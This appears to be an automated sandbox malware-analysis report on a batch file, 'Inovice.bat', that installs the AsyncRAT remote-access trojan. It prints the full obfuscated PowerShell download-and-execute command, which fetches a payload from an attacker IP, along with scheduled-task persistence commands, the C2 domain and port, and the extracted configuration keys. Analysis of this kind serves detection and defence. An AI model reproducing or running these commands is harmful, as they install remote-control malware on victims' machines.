File name: | Inovice.bat |
Full analysis: | https://app.any.run/tasks/3bd6edf1-e76e-40d5-bfaa-0ef4a844e6e8 |
Verdict: | Malicious activity |
Threats: | AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions. |
Analysis date: | December 05, 2022, 19:47:44 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | UTF-8 Unicode text, with very long lines, with CRLF line terminators |
MD5: | BF021F142FA831D9BE71B25476DAF0F6 |
SHA1: | F2F5735ACD04E2228AC09586CAD425B82409F253 |
SHA256: | 8DBAC79CA4B263BE822F6DDAE805B854753E1118767353654CC26DAB34F44C49 |
SSDEEP: | 192:lzJ1cqL+cWrc2DaODe779zgWg94YWNjaOfQ:pJ1cqL+cWrc2DFe77pgWg94YWNje |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3248 | C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Inovice.bat" " | C:\Windows\system32\cmd.exe | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3712 | CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$2DE18D252BD8380E8B2956CA14B0AA53DE142937B1671F23937EB753D08D6268DB1724F34D8DDBE007F0401ED14E8A1D625989410FEEC1E3766844EDBF765246489E1DCC2D1833DA6E69D3385C4CBD5FD2D105456337A5B6341D7D7DFE413FE3F0A8B019='IEX(NEW-OBJECT NET.W';$83F3ACCD26BC00B0E6DDBA5A7DF914BDB72D2DBE20BB9DA9E3D42ECE19F6CAC2B23E1794130F2013493926E052E189D0CB23414E278E9AF673D174344A4188514E884F1E6E79DD70C9F0DD9E7FA60E1057D5C8803A140AAD1867A9700496CC4691BF08E5='EBCLIENT).DOWNLO';[BYTE[]];$8E36696559311019BAC3A3F1DBB8ADEF9E36ABF212EECE0D145B8E2EF94918878BDC1F5A8F360D5CE893479F38B5AD1B82BC263076F50F4842978BE4E8D31F43D29E8DD595302F3A0408597F05114E82276DD5DEBE0E2638386DDC128E3B63A3742B1032='2B19841E07075A88D200C3A1A0ED012553F0BF62A9A60ED56B2C7EF4BB2958045693D67249B31F577D3DE8F0D8CE3A6D0B2DE5D9D4FCC2D7E4618E8EA662F464B244D78C9F94B26666E8A737804CD2E8EBA8D64D240BB68CA60AB99C1B0285A27862FFA2(''http://198.20.177.229:444/x.png'')'.REPLACE('2B19841E07075A88D200C3A1A0ED012553F0BF62A9A60ED56B2C7EF4BB2958045693D67249B31F577D3DE8F0D8CE3A6D0B2DE5D9D4FCC2D7E4618E8EA662F464B244D78C9F94B26666E8A737804CD2E8EBA8D64D240BB68CA60AB99C1B0285A27862FFA2','ADSTRING');[BYTE[]];IEX($2DE18D252BD8380E8B2956CA14B0AA53DE142937B1671F23937EB753D08D6268DB1724F34D8DDBE007F0401ED14E8A1D625989410FEEC1E3766844EDBF765246489E1DCC2D1833DA6E69D3385C4CBD5FD2D105456337A5B6341D7D7DFE413FE3F0A8B019+$83F3ACCD26BC00B0E6DDBA5A7DF914BDB72D2DBE20BB9DA9E3D42ECE19F6CAC2B23E1794130F2013493926E052E189D0CB23414E278E9AF673D174344A4188514E884F1E6E79DD70C9F0DD9E7FA60E1057D5C8803A140AAD1867A9700496CC4691BF08E5+$8E36696559311019BAC3A3F1DBB8ADEF9E36ABF212EECE0D145B8E2EF94918878BDC1F5A8F360D5CE893479F38B5AD1B82BC263076F50F4842978BE4E8D31F43D29E8DD595302F3A0408597F05114E82276DD5DEBE0E2638386DDC128E3B63A3742B1032) | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1112 | POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$2DE18D252BD8380E8B2956CA14B0AA53DE142937B1671F23937EB753D08D6268DB1724F34D8DDBE007F0401ED14E8A1D625989410FEEC1E3766844EDBF765246489E1DCC2D1833DA6E69D3385C4CBD5FD2D105456337A5B6341D7D7DFE413FE3F0A8B019='IEX(NEW-OBJECT NET.W';$83F3ACCD26BC00B0E6DDBA5A7DF914BDB72D2DBE20BB9DA9E3D42ECE19F6CAC2B23E1794130F2013493926E052E189D0CB23414E278E9AF673D174344A4188514E884F1E6E79DD70C9F0DD9E7FA60E1057D5C8803A140AAD1867A9700496CC4691BF08E5='EBCLIENT).DOWNLO';[BYTE[]];$8E36696559311019BAC3A3F1DBB8ADEF9E36ABF212EECE0D145B8E2EF94918878BDC1F5A8F360D5CE893479F38B5AD1B82BC263076F50F4842978BE4E8D31F43D29E8DD595302F3A0408597F05114E82276DD5DEBE0E2638386DDC128E3B63A3742B1032='2B19841E07075A88D200C3A1A0ED012553F0BF62A9A60ED56B2C7EF4BB2958045693D67249B31F577D3DE8F0D8CE3A6D0B2DE5D9D4FCC2D7E4618E8EA662F464B244D78C9F94B26666E8A737804CD2E8EBA8D64D240BB68CA60AB99C1B0285A27862FFA2(''http://198.20.177.229:444/x.png'')'.REPLACE('2B19841E07075A88D200C3A1A0ED012553F0BF62A9A60ED56B2C7EF4BB2958045693D67249B31F577D3DE8F0D8CE3A6D0B2DE5D9D4FCC2D7E4618E8EA662F464B244D78C9F94B26666E8A737804CD2E8EBA8D64D240BB68CA60AB99C1B0285A27862FFA2','ADSTRING');[BYTE[]];IEX($2DE18D252BD8380E8B2956CA14B0AA53DE142937B1671F23937EB753D08D6268DB1724F34D8DDBE007F0401ED14E8A1D625989410FEEC1E3766844EDBF765246489E1DCC2D1833DA6E69D3385C4CBD5FD2D105456337A5B6341D7D7DFE413FE3F0A8B019+$83F3ACCD26BC00B0E6DDBA5A7DF914BDB72D2DBE20BB9DA9E3D42ECE19F6CAC2B23E1794130F2013493926E052E189D0CB23414E278E9AF673D174344A4188514E884F1E6E79DD70C9F0DD9E7FA60E1057D5C8803A140AAD1867A9700496CC4691BF08E5+$8E36696559311019BAC3A3F1DBB8ADEF9E36ABF212EECE0D145B8E2EF94918878BDC1F5A8F360D5CE893479F38B5AD1B82BC263076F50F4842978BE4E8D31F43D29E8DD595302F3A0408597F05114E82276DD5DEBE0E2638386DDC128E3B63A3742B1032) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
3992 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\Logs\install.vbs" | C:\Windows\System32\WScript.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
3112 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\admin\AppData\Roaming\Logs\install.ps1')) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
3428 | "C:\Windows\system32\schtasks.exe" /create /tn det /sc minute /st 00:10 /tr C:\Users\admin\AppData\Roaming\Logs\Loader.vbs | C:\Windows\system32\schtasks.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2624 | "C:\Windows\system32\schtasks.exe" /create /tn administartor /SC minute /MO 3 /tr C:\Users\admin\AppData\Roaming\Logs\Loader.vbs | C:\Windows\system32\schtasks.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2692 | C:\Windows\System32\WScript.exe "C:\Users\admin\AppData\Roaming\Logs\Loader.vbs" | C:\Windows\System32\WScript.exe | — | taskeng.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
1260 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\admin\AppData\Roaming\Logs\Report.ps1')) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
2116 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: aspnet_compiler.exe Version: 4.0.30319.34209 built by: FX452RTMGDR AsyncRat(PID) Process(2116) aspnet_compiler.exe C2 (1)aboreda.linkpc.net Ports (1)6666 Version| Edit 3LOSH RAT Autorunfalse MutexAsyncMutex_fghd CertificateMIIE8jCCAtqgAwIBAgIQANbiVxLaNmSYyv61DmCgDzANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwNDE0MjMyNTI3WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJZsIsXBl2b0q/B3i8jEIs3V21H0zFCak2edQRldp7T71gCRF3gDcDdUQ2gKHnqhJYT+n6ivj/5B... Server_SignatureGN/8+ivB5wP1EgjZz+u1FhO8aO9NgzdVSIcOWchN4HViQsmv9aHf+cFGGYig0z/6sh99BuCvSo8a4DxHwzbuD8XTbnyWbMFpqRIBWVDUC2byxpV9WOSo/wIDfM1eH4aC7w2O2lw/+Vr46R+v9Q39gocEdKlWmM67S2+FMW/y50Q/CTXP/JRNcPLgJpEP9CwQ6ykMP/idAxxIyW279D0IqdLKbHCEmKQ8eNdQyDKv/0JJumBazodAsL4i+P0wdwFtHV3+JhpN2MmDzi67uD/WCEAqmZAvquDZAnaRZK2LrqCS... AntiVMfalse PasteBintrue bdosfalse BotnetBTC Address Aes_Key561bcf00f570f137c8049f75c5148cefbf0cac7746be869c32dad39fe5aefa7c Saltbfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941 Install_Folder%AppData% |
(PID) Process: | (1112) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
(PID) Process: | (1112) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
(PID) Process: | (1112) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | FileTracingMask |
Value: | |||
(PID) Process: | (1112) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
(PID) Process: | (1112) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
(PID) Process: | (1112) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
(PID) Process: | (1112) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS |
Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
(PID) Process: | (1112) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS |
Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
(PID) Process: | (1112) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS |
Operation: | write | Name: | FileTracingMask |
Value: | |||
(PID) Process: | (1112) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS |
Operation: | write | Name: | ConsoleTracingMask |
Value: |
PID | Process | Filename | Type | |
---|---|---|---|---|
1112 | powershell.exe | C:\Users\admin\AppData\Roaming\Logs\Report.ps1 | text | |
MD5:AFEB32EFA5CDAAEE1360F00886C19B10 | SHA256:8C46090FB44AF131902A35351D71A5026EEEF32B3CAF880A0C7398BE5D3AD85F | |||
1112 | powershell.exe | C:\Users\admin\AppData\Roaming\Logs\Loader.vbs | text | |
MD5:7A1F08FD27F797B5A5CC2D79F8F6BBA7 | SHA256:922DC773ABDFD0812B0E1ADCAABF9DEA2E5F0264573266CF0B024FEB984C632E | |||
1112 | powershell.exe | C:\Users\admin\AppData\Roaming\Logs\install.vbs | text | |
MD5:E35D96B22A7A748D8A85089EA37B003E | SHA256:06B9130D3E031C4729AD96332ED15189D5391B88F81C5BBB0F3A94AC4A05185A | |||
1112 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | dbf | |
MD5:446DD1CF97EABA21CF14D03AEBC79F27 | SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF | |||
2116 | aspnet_compiler.exe | C:\Users\admin\AppData\Local\Temp\Cab15F1.tmp | compressed | |
MD5:FC4666CBCA561E864E7FDF883A9E6661 | SHA256:10F3DEB6C452D749A7451B5D065F4C0449737E5EE8A44F4D15844B503141E65B | |||
2116 | aspnet_compiler.exe | C:\Users\admin\AppData\Local\Temp\Tar15F2.tmp | cat | |
MD5:73B4B714B42FC9A6AAEFD0AE59ADB009 | SHA256:C0CF8CC04C34B5B80A2D86AD0EAFB2DD71436F070C86B0321FBA0201879625FD | |||
1112 | powershell.exe | C:\Users\admin\AppData\Local\Temp\5ls2h5gk.p1g.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
2116 | aspnet_compiler.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | binary | |
MD5:3EC598FDA7DA5A6080350EADC34CA03F | SHA256:9739D6314CAEA5B5779C6D80E00F205CD57594DC702DAA458528BF92D1E1C1DB | |||
1260 | powershell.exe | C:\Users\admin\AppData\Local\Temp\51v2aea5.1nk.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
1260 | powershell.exe | C:\Users\admin\AppData\Local\Temp\4cgvd2ku.ga3.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1112 | powershell.exe | GET | 200 | 198.20.177.229:444 | http://198.20.177.229:444/x.png | US | text | 243 Kb | malicious |
2116 | aspnet_compiler.exe | GET | 200 | 95.140.236.128:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?9f7f011d88e2d5c1 | GB | compressed | 61.4 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2116 | aspnet_compiler.exe | 198.20.177.229:6666 | aboreda.linkpc.net | SERVER-MANIA | US | malicious |
2116 | aspnet_compiler.exe | 95.140.236.128:80 | ctldl.windowsupdate.com | LLNW | US | malicious |
1112 | powershell.exe | 198.20.177.229:444 | aboreda.linkpc.net | SERVER-MANIA | US | malicious |
Domain | IP | Reputation |
---|---|---|
aboreda.linkpc.net |
| malicious |
ctldl.windowsupdate.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
1112 | powershell.exe | Misc activity | ET INFO [TW] Likely Hex Executable String |
1112 | powershell.exe | Executable code was detected | ET SHELLCODE Common 0a0a0a0a Heap Spray String |
— | — | Potentially Bad Traffic | ET INFO Observed DNS Query to DynDNS Domain (linkpc .net) |
2116 | aspnet_compiler.exe | A Network Trojan was detected | ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) |
2116 | aspnet_compiler.exe | A Network Trojan was detected | ET TROJAN Generic AsyncRAT Style SSL Cert |